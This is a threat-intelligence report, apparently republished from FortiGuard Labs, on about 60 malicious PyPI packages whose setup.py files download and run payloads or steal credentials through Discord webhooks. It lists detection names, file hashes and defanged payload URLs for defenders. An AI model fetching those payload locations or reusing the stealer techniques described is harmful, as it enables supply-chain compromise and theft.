By monitoring an open-source ecosystem, the FortiGuard Labs team recently discovered over 60 zero-day attacks embedded in PyPI packages (Python Package Index) between early February and mid-March of 2023. In this report[1], analysts cover all the packages found, grouping them into similar attacks or behaviors.
The packages in this set were found to be similar:
- py-hydraurlstudy (version 2.37)
- tptoolpywgui (version 10.56)
- libgetrandram (version 7.78)
- esqultraultrapong (version 7.37)
- esqhackedLGTBpip (version 5.4)
- tppyrandomed (version 4.33)
- esqpepintpyw (version 3.40)
- py-proofnvidiavm (version 7.87)
- selfvisapostosint (version 1.16)
- esqhttpguicc (version 2.76)
- esqcpupipkill (version 9.35)
- py-ultrageturl (version 4.17)
- esqpeprandpaypal (version 5.38)
- esqhttppywinfo (version 8.86)
- tppyLGTBnvidia (version 3.11)
- selfpostmcintel (version 10.27)
- esqrerecandy (version 2.70)
- esqpaypalnvidiaurl (version 4.73)
- librereplacereplace (version 8.23)
- selfhackedrandomstudy (versions 4.59, 5.55)
- libvirtualsplitstring (version 2.35)
- py-infohydrarandom (version 1.57)
- esqproofpongint (version 4.27)
- selfccvirtualgame (version 6.70)
- tpintelpullcpu (version 9.31)
- selflibmineload (version 5.34)
- esqsplitpushpush (version 7.71)
- selfproofstudyrand (version 1.59)
- libcontrolverLGTB (version 5.50)
- esqgameloadrandom (version 4.81)
- selfpaypalcontrolsuper (version 5.71)
- libpipinfoad (version 10.35)
- libpywstrvm (version 7.15)
- selfhydrastudycc (version 2.15)
- tpstringcraftget (version 6.42)
- esqlibkillstr (version 10.27)
- selfrandompullver (version 1.9)
- tpreloadad (version 1.68)
- selfinturlstudy (version 2.23)
- selfosintgrandrandom (version 2.67)
Figure 1: One of the variants of setup.py of set one
The setup.py file in these packages tries to run a PowerShell with a command encoded with Base64 that attempts to download a potentially malicious executable and execute it. The encoded command is decoded as follows:
Figure 2: Decoded PowerShell command
This next set of packages includes:
- useragentclient (version 1.0)
- etherapi (version 1.0)
- colorstyle (version 1.0)
- ligitgays (version 1.0)
- ligitkidss (version 1.0)
- tls-python (version 1.0)
- tlsproxies (version 1.0)
- xboxlivepy (version 1.0)
- syntax-init (version 1.0)
The setup.py file in these packages tries to execute a python script written to connect to a URL that may contain malicious code. The contents of the URL resolve to the code we found in set three, below.
Figure 3: One of the variants of setup.py in set two
The third set of packages includes:
- trc20-unlocker (version 1.0)
- snwproxies (version 1.0)
- thebypasstool (version 1.0)
- judyb-advanced (version 1.0)
The setup.py file in these packages tries to steal sensitive information, such as credit cards, wallets, account logins, etc. using a Discord webhook.
Figure 4: Code snippet of one of the variants of setup.py in set three
While the setup.py file for the component judyb-advanced may at first appear different from the others in this set (Figure 5), after being decoded with Base64 it resolves to the code shown in Figure 4.
Figure 5: Code snippet of setup.py of judyb-advanced
This set of packages includes:
- v4pe (version 5)
- telthi (version 1)
The setup.py file in these packages includes the Empyrean stealer code, an open-source code to launch an attack to steal users’ sensitive information. The code in these packages is heavily obfuscated, but we were able to see several techniques, including anti-debug, autorun, and injection methods written in Python.
Figure 6: Code snippet of setup.py one of the variants in set four
This set of packages includes:
- aiotoolsbox (versions 1.4.5, 1.4.7)
- asyncio-box (versions 1.4.6)
The setup.py file in these packages tries to download a zip file to a directory (depending on python version), extract its contents, run a script contained in the zip file, and then remove its directory.
Figure 7: Code snippet of one of the variants of setup.py in set five
The packages in this set include:
- pycolouring (version 0.1.5)
- colourfool (version 0.1.5)
The setup.py file in these packages tries to download a zip file containing malicious code, extract it, and then try to run it, all while trying to hide it from the user.
Figure 8: Code snippets of setup.py in set six
This set includes the following package:
- gmgeoip (version 0.0.2)
Its setup.py file tries to exfiltrate user information to what looks like a webhook URL.
Figure 9: setup.py in set seven
This set includes the following package:
- httpx-advanced3 (version 0.1.0)
Its setup.py file tries to execute heavily obfuscated code. Metadata information of the package gathered from its GitHub link, “https://github.com/Napoleon-x/multi-logger-python-discord-token-logger-and-chrome-password-stealer-through-webhooks”, analysts got a clue that it may be a password stealer through a Discord webhook.
Figure 10: setup.py in set eight
This set includes the following package:
- pycrypterexe (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3)
Its setup.py file tries to run a potentially malicious python script and then remove it.
Figure 11: One of the setup.py in one of the versions of pycrypterexe
Conclusion - In this report, researchers have reviewed several sets of packages, each with different styles of attacks, that we have gathered over the past month or so. The packages in each set seem to use similar methods of attack. Given the volume and variety of malicious packages we have discovered, Python end users should use caution when downloading packages and double-check them before use.
Analysts will continue monitoring new open-source packages and reporting on any malicious packages we find to help prevent users from becoming victims of a supply chain attack.
FortiGuard Anti-Virus detects the malicious files identified in this report as:
- py-hydraurlstudy-2.37 setup.py:Python/Agent.KAF!tr
- tptoolpywgui-10.56 setup.py:Python/Agent.KAF!tr
- libgetrandram-7.78 setup.py:Python/Agent.KAF!tr
- esqultraultrapong-7.37 setup.py:Python/Agent.KAF!tr
- esqhackedLGTBpip-5.4 setup.py:Python/Agent.KAF!tr
- tppyrandomed-4.33 setup.py:Python/Agent.KAF!tr
- esqpepintpyw-3.40 setup.py:Python/Agent.KAF!tr
- py-proofnvidiavm-7.87 setup.py:Python/Agent.KAF!tr
- selfvisapostosint-1.16 setup.py:Python/Agent.KAF!tr
- esqhttpguicc-2.76 setup.py:Python/Agent.KAF!tr
- esqcpupipkill-9.35 setup.py:Python/Agent.KAF!tr
- py-ultrageturl-4.17 setup.py:Python/Agent.KAF!tr
- esqpeprandpaypal-5.38 setup.py:Python/Agent.KAF!tr
- esqhttppywinfo-8.86 setup.py:Python/Agent.KAF!tr
- tppyLGTBnvidia-3.11 setup.py:Python/Agent.KAF!tr
- selfpostmcintel-10.27 setup.py:Python/Agent.KAF!tr
- esqrerecandy-2.70 setup.py:Python/Agent.KAF!tr
- esqpaypalnvidiaurl-4.73 setup.py:Python/Agent.KAF!tr
- librereplacereplace-8.23 setup.py:Python/Agent.KAF!tr
- selfhackedrandomstudy-4.59 setup.py:Python/Agent.KAF!tr
- selfhackedrandomstudy-5.55 setup.py:Python/Agent.KAF!tr
- libvirtualsplitstring-2.35 setup.py:Python/Agent.KAF!tr
- py-infohydrarandom-1.57 setup.py:Python/Agent.KAF!tr
- esqproofpongint-4.27 setup.py:Python/Agent.KAF!tr
- selfccvirtualgame-6.70 setup.py:Python/Agent.KAF!tr
- tpintelpullcpu-9.31 setup.py:Python/Agent.KAF!tr
- selflibmineload-5.34 setup.py:Python/Agent.KAF!tr
- esqsplitpushpush-7.71 setup.py:Python/Agent.KAF!tr
- selfproofstudyrand-1.59 setup.py:Python/Agent.KAF!tr
- libcontrolverLGTB-5.50 setup.py:Python/Agent.KAF!tr
- esqgameloadrandom-4.81 setup.py:Python/Agent.KAF!tr
- selfpaypalcontrolsuper-5.71 setup.py:Python/Agent.KAF!tr
- libpipinfoad-10.35 setup.py:Python/Agent.KAF!tr
- libpywstrvm-7.15 setup.py:Python/Agent.KAF!tr
- selfhydrastudycc-2.15 setup.py:Python/Agent.KAF!tr
- tpstringcraftget-6.42 setup.py:Python/Agent.KAF!tr
- esqlibkillstr-10.27 setup.py:Python/Agent.KAF!tr
- selfrandompullver-1.9 setup.py:Python/Agent.KAF!tr
- tpreloadad-1.68 setup.py:Python/Agent.KAF!tr
- selfinturlstudy-2.23 setup.py:Python/Agent.KAF!tr
- selfosintgrandrandom-2.67 setup.py:Python/Agent.KAF!tr
- colorstyle-1.0 setup.py:Python/Agent.KAF!tr
- snwproxies-1.0 setup.py:Python/Agent.KAF!tr
- thebypasstool-1.0 setup.py:Python/Agent.KAF!tr
- judyb-advanced-1.0 setup.py:Python/Agent.KAF!tr
- telthi-1 setup.py:Python/Agent.KAF!tr
- pycolouring-0.1.5 setup.py:Python/Agent.KAF!tr
- pycolouring-0.1.5 code.py:Python/Agent.KAF!tr
- colourfool-0.1.5 setup.py:Python/Agent.KAF!tr
- gmgeoip-0.0.2 setup.py:Python/Agent.KAF!tr
- httpx-advanced3-0.1.0 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.0 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.1 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.2 setup.py:Python/Agent.KAF!tr
- pycrypterexe-1.0.3 setup.py:Python/Agent.KAF!tr
- useragentclient-1.0 setup.py:Python/Agent.LK!tr
- etherapi-1.0 code.py:Python/Agent.LK!tr
- ligitgays-1.0 setup.py:Python/Agent.LK!tr
- ligitkidss-1.0 setup.py:Python/Agent.LK!tr
- tls-python-1.0 setup.py:Python/Agent.LK!tr
- xboxlivepy-1.0 setup.py:Python/Agent.LK!tr
- syntax-init-1.0 setup.py:Python/Agent.LK!tr
- tlsproxies-1.0 setup.py:Python/Agent.EAD2!tr.dldr
- trc20-unlocker-1.0 setup.py:Python/Agent.DC4D!tr.pws
- v4pe-5 setup.py:Python/Injector.A4FE!tr
- v4pe-5 obfuscated.js:JS/Agent.QKA!tr
IOCs
- py-hydraurlstudy-2.37 setup.py
a9963de42759b10941ca69cdd2d1e042
- tptoolpywgui-10.56 setup.py
fefd35ee35bc1bc95e86d85efd16305a
- libgetrandram-7.78 setup.py
e2ca2b4337f1024e989cfa22c227e299
- esqultraultrapong-7.37 setup.py
b5eef88865f918414bafb8746270af46
- esqhackedLGTBpip-5.4 setup.py
7d94454a11dba12c29f391c6c38da88c
- tppyrandomed-4.33 setup.py
3674bec2a77700e395ed8362dcd6ba36
- esqpepintpyw-3.40 setup.py
8b8efbbe6905992de8b33d9dc025e8a0
- py-proofnvidiavm-7.87 setup.py
ab431aa32559ae212850dc7c8fba409f
- selfvisapostosint-1.16 setup.py
4e6aa7bf3c19e1a1efe2919849c2d558
- esqhttpguicc-2.76 setup.py
ce49e4d8901b4ba5de70346136c32014
- esqcpupipkill-9.35 setup.py
84844048aadadabf86024ffa30f7360f
- py-ultrageturl-4.17 setup.py
dcc57259504d3e74a03a706d9f053bfc
- esqpeprandpaypal-5.38 setup.py
d3d31b1d776064a1ae7b5fb7da3e70ed
- esqhttppywinfo-8.86 setup.py
b50cd92b8c7d0292a802db8f44b5e601
- tppyLGTBnvidia-3.11 setup.py
066504d4d96e87e03ee4b0a376a52e48
- selfpostmcintel-10.27 setup.py
8476f7131e86612e66fbc713f7b9b3b4
- esqrerecandy-2.70 setup.py
7198588c88e63dd8b5b9703c4eb60c00
- esqpaypalnvidiaurl-4.73 setup.py
16485e4dd28267454ca662b63b75be7c
- librereplacereplace-8.23 setup.py
775340be445cf019a84c57fdcf2604c
- selfhackedrandomstudy-4.59 setup.py
7e9c14bfe6319445f0d263841b8cf70b
- selfhackedrandomstudy-5.55 setup.py
90de1fe8b1f065dc955954f6bf312d62
- libvirtualsplitstring-2.35 setup.py
2b0687a1c481640a509ce7318139cd8f
- py-infohydrarandom-1.57 setup.py
37ddd37dd81c89403db80f9f8a028da1
- esqproofpongint-4.27 setup.py
7aaf54b11f718bf58088f0209f24720e
- selfccvirtualgame-6.70 setup.py
1696d741e7662f308d3e9652a0459f8f
- tpintelpullcpu-9.31 setup.py
536e633502346758c19001ec8da5bf1d
- selflibmineload-5.34 setup.py
fda5f1b4580bc9a52452a5a48150abcb
- esqsplitpushpush-7.71 setup.py
7632cb077c1317a5b125f8abb027129d
- selfproofstudyrand-1.59 setup.py
d2b6638b1b1b74efe5743b09b737247b
- libcontrolverLGTB-5.50 setup.py
4dc485dc9c7e9b93cc5b1e2d9e324fb1
- esqgameloadrandom-4.81 setup.py
bc46032389f109269a3e6234172c36fa
- selfpaypalcontrolsuper-5.71 setup.py
463219aa4369ce899d7d8954a38461f1
- libpipinfoad-10.35 setup.py
5cdcfa41a9103c7d010fefc8d707e90e
- libpywstrvm-7.15 setup.py
1ac11dea159ef156efa2ef5e9203ebfa
- selfhydrastudycc-2.15 setup.py
41c09093ec7fe35dbbf9c6a883a785a7
- tpstringcraftget-6.42 setup.py
5fa2cf47fe507a953340910e751c141a
- esqlibkillstr-10.27 setup.py
1fd6d8fceb580e6533fb4e738cc0649a
- selfrandompullver-1.9 setup.py
6e00f43c4fd7a823930a1b5b4521eb6a
- tpreloadad-1.68 setup.py
0c6d69eaa4ef032f12488f69212fe97f
- selfinturlstudy-2.23 setup.py
7c59a65fac3f66e12021d9c58378a8a9
- selfosintgrandrandom-2.67 setup.py
3489759928419c648b64203a7c0774f8
- useragentclient-1.0 setup.py
1fc512f11f1a82c21ccf212bb33d47e8
- etherapi-1.0 code.py
59b3158f9deb2af0456630651b70728d
- colorstyle-1.0 setup.py
6cb28f3b3f1e7af941f4488a0f90031f
- ligitgays-1.0 setup.py
4058792e610d3bffcbbd974f4c1e2684
- ligitkidss-1.0 setup.py
5e201a9b6e9ceccf426bd7156a994bd2
- tls-python-1.0 setup.py
474314671210b3072fd5fbab0055157c
- tlsproxies-1.0 setup.py
9ad1e8cbaea7c81f88e642d29b15ead2
- xboxlivepy-1.0 setup.py
2e1f58d6bc5a17b0d960cbd2f5c35439
- syntax-init-1.0 setup.py
770c30e227785114a0a6bca18369ac79
- trc20-unlocker-1.0 setup.py
d41bc11f65fa9c685f344203bc119bc8
- snwproxies-1.0 setup.py
806a4eb3c5028beb33391655f563f456
- thebypasstool-1.0 setup.py
06806a437fffa0dab76ad210dd7f4882
- judyb-advanced-1.0 setup.py
dc64710af040a0b3d60c1549511b822a
- v4pe-5 setup.py
5a225ac739236ea5bad546bea3cfa4fe
- telthi-1 setup.py
d2b9ab6be1eba05cc3a2153adf2f42fc
- v4pe-5 obfuscated.js
499796cf69911760fb01c56b5018b4d3
- pycolouring-0.1.5 setup.py
35179043d9dac475e909f738607c37e4
- pycolouring-0.1.5 code.py
3694c1e415e8eb8dc42d22dc64b8da45
- gmgeoip-0.0.2 setup.py
aeb6de64365803f9d880a4e61be84bbb
- httpx-advanced3-0.1.0 setup.py
54bf5a75397d4bfff31117da99fb9284
- pycrypterexe-1.0.0 setup.py
64ed73a23586a8a2b004d417a640cd1e
- pycrypterexe-1.0.1 setup.py
9f7925c38a63e97a631fb59bc0ac6181
- pycrypterexe-1.0.2 setup.py
4e04fb6bf5e9220b89b91140d0463ddd
- pycrypterexe-1.0.3 setup.py
b784f35cdfa84d6c1d75c5b170fc60a0
Malicious URLs
- hxxps://paste[.]bingner[.]com/paste/jr7ow/raw
- hxxps://raw[.]githubusercontent[.]com/addi00000/empyrean-injection/main/obfuscated[.]js
- hxxps://cdn[.]discordapp[.]com/attachments/1072676199073062975/1072698468956655726/Game[.]zip
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization, and we would like to thank Fortinet Labs for this great report. Fortinet has long supplied technical reports of high value to Red Sky Alliance. For questions, comments, or assistance, please get in touch with the office at 1-844-492-7225 or feedback@redskyalliance. com
Weekly Cyber Intelligence Briefings:
- Reporting: https://www. redskyalliance. org/
- Website: https://www. wapacklabs. com/
- LinkedIn: https://www. linkedin. com/company/64265941
Weekly Cyber Intelligence Briefings:
REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/5504229295967742989
[1] https://www.fortinet.com/blog/threat-research/supply-chain-attack-via-new-malicious-python-packages?lctg=141970831
Comments